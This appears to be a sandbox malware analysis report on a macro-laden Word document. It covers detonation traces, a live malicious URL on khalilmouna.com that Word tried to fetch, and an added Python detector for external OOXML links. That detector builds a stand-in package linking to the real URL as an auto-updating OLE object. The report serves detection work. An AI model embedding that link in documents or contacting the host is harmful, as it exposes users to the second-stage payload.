Malware Analysis Report

2025-01-22 19:16

Sample ID 240722-qtt2sszcng
Target 635e0b3decdc6bd51760fddf495b9527_JaffaCakes118
SHA256 de955cceb338ca2def37a9273435e0a238fa80f4867854141738c9cc47b38eaf
Tags
macro macro_on_action
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

de955cceb338ca2def37a9273435e0a238fa80f4867854141738c9cc47b38eaf

Threat Level: Likely malicious

The file 635e0b3decdc6bd51760fddf495b9527_JaffaCakes118 was found to be: Likely malicious.

Analyst note: the verdict rests on two findings. Static analysis flags a macro wired to an auto-trigger, and in both detonations Word loaded VBA UserForm resources (the MSForms.exd file written under Temp\VBE and the MSForms interface registrations such as _UserForm, IScrollbar and IMultiPage under the user's Classes hive are the footprint of a form being instantiated). Word then resolved an external reference carried inside the document package, despite its .doc extension, to https://khalilmouna.com/docs/count.xls?ZhEH_H437018.635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc; Office recorded that URL as a subkey under HKCU\Software\Microsoft\Office\Common\Offline\Files and started EXCEL.EXE with /automation -Embedding, the shape of a linked spreadsheet object being activated. Note that the query string embeds the document's own file name. In both runs only a DNS query for khalilmouna.com was observed and no TCP connection to that host followed, so the remote spreadsheet and whatever it would have delivered were not retrieved; the second stage of this sample is unobserved. The remaining signatures (AddClipboardFormatListener, SetWindowsHookEx, WriteProcessMemory, the SeShutdownPrivilege and SeAuditPrivilege token adjustments, the processor and BIOS registry reads, the wiatrace.log write and the splwow64.exe print proxy) are routine Office behaviour and carry no weight on their own.

Malicious Activity Summary

macro macro_on_action

Office macro that triggers on suspicious action

Suspicious Office macro

Abuses OpenXML format to download file from external location

Drops file in Windows directory

Office loads VBA resources, possible macro or embedded object present

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-22 13:33

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-22 13:33

Reported

2024-07-22 13:42

Platform

win7-20240708-en

Max time kernel

144s

Max time network

137s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc"

Signatures

Abuses OpenXML format to download file from external location

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\Common\Offline\Files\https://khalilmouna.com/docs/count.xls?ZhEH_H437018.635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A (3 events)
Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\14.0\Common C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
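
The signature above fires because Office followed a link stored inside the document package. The script below is an added example, not part of this report or of the sandbox's tooling: it lists every TargetMode="External" relationship in an OOXML package with the Python standard library, so the same target can be found statically before detonation. The package it scans is a constructed stand-in that reuses only the URL observed here; the trusted-host suffix list is an assumption of the example.

```python
"""Static check for external targets inside an OOXML (OpenXML) package.

Added example for this report, not sandbox tooling. In OOXML, links that Office
resolves at open time are <Relationship ... TargetMode="External"> entries in
the package's *.rels parts, so a zip reader can surface them without Office.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Assumption of this example: hosts treated as first-party Office traffic.
TRUSTED_SUFFIXES = ("microsoft.com", "office.com", "office.net", "live.com")
# URL observed in the behavioural run (Offline\Files key opened by EXCEL.EXE).
OBSERVED_URL = ("https://khalilmouna.com/docs/count.xls?"
                "ZhEH_H437018.635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc")


def is_ooxml(data: bytes) -> bool:
    """OOXML is a zip (starts with PK); a legacy CFB .doc starts with D0 CF 11 E0
    and needs an OLE parser instead, whatever the extension says."""
    return data[:2] == b"PK"


def external_relationships(data: bytes):
    """Yield (rels_part, rId, short_type, target) for every external relationship."""
    if not is_ooxml(data):
        raise ValueError("not an OOXML package (OLE/CFB container?)")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                yield name, rel.get("Id", ""), rtype, rel.get("Target", "")


def suspicious_targets(data: bytes):
    """External relationships pointing at a remote host outside the trusted list."""
    hits = []
    for part, rid, rtype, target in external_relationships(data):
        remote = target.lower().startswith(("http://", "https://", "file:", "\\\\"))
        host = urlsplit(target).hostname or ""
        if remote and not host.endswith(TRUSTED_SUFFIXES):
            hits.append({"part": part, "rId": rid, "type": rtype, "target": target})
    return hits


def build_sample_docx() -> bytes:
    """Constructed minimal package (NOT the real sample): one linked OLE object
    whose target is the observed URL, plus a benign first-party hyperlink to
    show that the filter keeps such targets out of the hit list."""
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/></Types>')
    root_rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{REL_BASE}officeDocument" Target="word/document.xml"/>'
        '</Relationships>')
    doc_rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{REL_BASE}hyperlink" Target="https://www.microsoft.com/" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{REL_BASE}oleObject" Target="{OBSERVED_URL}" TargetMode="External"/>'
        '</Relationships>')
    document = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:o="urn:schemas-microsoft-com:office:office" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:body><w:p><w:r><w:object>'
        '<o:OLEObject Type="Link" ProgID="Excel.Sheet.8" r:id="rId2" UpdateMode="Always"/>'
        '</w:object></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in suspicious_targets(build_sample_docx()):
        print(f"{hit['part']} {hit['rId']} {hit['type']} -> {hit['target']}")
```

On a real sample pass the file bytes instead of build_sample_docx(). If is_ooxml() returns False the file is a legacy OLE container and the link has to be pulled from its streams with an OLE parser instead. An oleObject or attachedTemplate relationship whose target is a non-first-party host is the static counterpart of the behaviour in the table above.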

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A (3 events)

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{976B17CD-8F6A-409D-ADCA-8D9AB2E7369A}\2.0\HELPDIR C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{976B17CD-8F6A-409D-ADCA-8D9AB2E7369A} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{976B17CD-8F6A-409D-ADCA-8D9AB2E7369A}\2.0\FLAGS\ = "6" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A (2 events)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A (2 events)

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 khalilmouna.com udp

Files

memory/1056-0-0x000000002FCB1000-0x000000002FCB2000-memory.dmp

memory/1056-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1056-2-0x0000000070C1D000-0x0000000070C28000-memory.dmp

memory/1056-11-0x0000000070C1D000-0x0000000070C28000-memory.dmp

memory/1056-61-0x0000000004710000-0x0000000004810000-memory.dmp

memory/1056-62-0x000000000D5F0000-0x000000000D6F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{F91EA32F-88C0-4AD9-833F-2593C2F8B5E8}

MD5 1c4ab7ce5e13fa3fb80e28c7206b50f8
SHA1 14d696e67904b3aa191fe869590df0409b8870ea
SHA256 15e209f71e49b39bcb850db8dc95f86098aa4e08c953ff959a54def69bc5a63a
SHA512 ce1a3b5a9fdafa9e2c7b38715ffd739aeac911edcfb94753cb3509a2ff1dcc89241a5af998fcdc2051cd7f895a1ad55fc33bfeaef14f0bba3699d64575ba0b8b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{51EA5863-5FCC-48B4-A95D-601C577EBDEE}.FSD

MD5 1478a60112050bcc41f898d613513458
SHA1 a0cc8cadf957d18fec2d796b05971d7d1838904d
SHA256 65620352aa20a067bc426f7816083868d2a279c3305c1f423d37f13609e7fd26
SHA512 b90f57420286da2035ad28847b8f90ea46bac1fdd59e27ef8eb9493afdde701a0e52a8f73241804a62c28f473cb0d30bc707b141f66ddfafe07d7853ced2f9ff

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 04005461551595d0fdc7a2730840fbf5
SHA1 5bd1f291765b043c91de2ce1980a04f4dc4efe62
SHA256 5b2e8faae5ea6af2ce7336e93d37571595d149696469d44c985b4cadb35d8431
SHA512 b9877cf3c572d4aed9bb3067692176e9f8dcc3fda1f8fcf74e3c715ffa43780e020a6e8599245260f3dbaa2661ba31683d8cf16639a72ec8bbee97dd0eb4538c

C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.acl

MD5 1ed6d4ceec6b270c291a717d3cdca011
SHA1 4b798c2ce8a2552f5e7fcd0d077965a8176aa37d
SHA256 99dbaca5077cddc5064eb35a99d681d1dcc021db5cb205c51f4413cfd90c329c
SHA512 240023e06c6bcbccb2b849f87553606e9d8cdc811e45024761055d0eaffba90042080004fc80950ee2103021715a61b8a3bb8c51d6de3a8bfbb6098b4f7b852b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{12B16580-4727-46EC-8683-F92E77A2A27A}.FSD

MD5 b533a3f2dffa47e62714526ad06b5e22
SHA1 57b86c25c9af6509121a0355c8a55108c083f705
SHA256 2115b8121eac72728f00d820e64dc7897ad09c55925760bba28b22bbe2f4bcb9
SHA512 f8aeea20c06a23d2fd5c979a77664249b19cbbd071d3d51a2255992e2a6e5d87b63b9f192ccda8e0121aea89bb7b4c2424a02b6ccb66ebb07d12d06e2b940ac6

memory/308-1031-0x000000005FFF0000-0x0000000060000000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 99c2a895b4a8535ffe387bb83239b5e4
SHA1 f24e05dd753a2d19a69299f4ae2c2ae12840beac
SHA256 b20d7714c9b146884c6aa7f86e1babed168ad3b8a84b8b9105dbc314fc8d1536
SHA512 a3b4ffe7960ac957401c51d6d9727198a76b8907b173201ea5c25221e9f03d8d4c141f99ccf424b27e69e7098947aca9e33565c674c0023b8d2ca7a4d2fd14be

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\VBE\MSForms.exd

MD5 34f6886eb5cf9c1c427496082e60523b
SHA1 dbb0c9b2283335aa762361f45d86923379ec4c41
SHA256 97000873a4edccce3e287a772f9c52351ada80394562917a4fbba2f00a2ab5f3
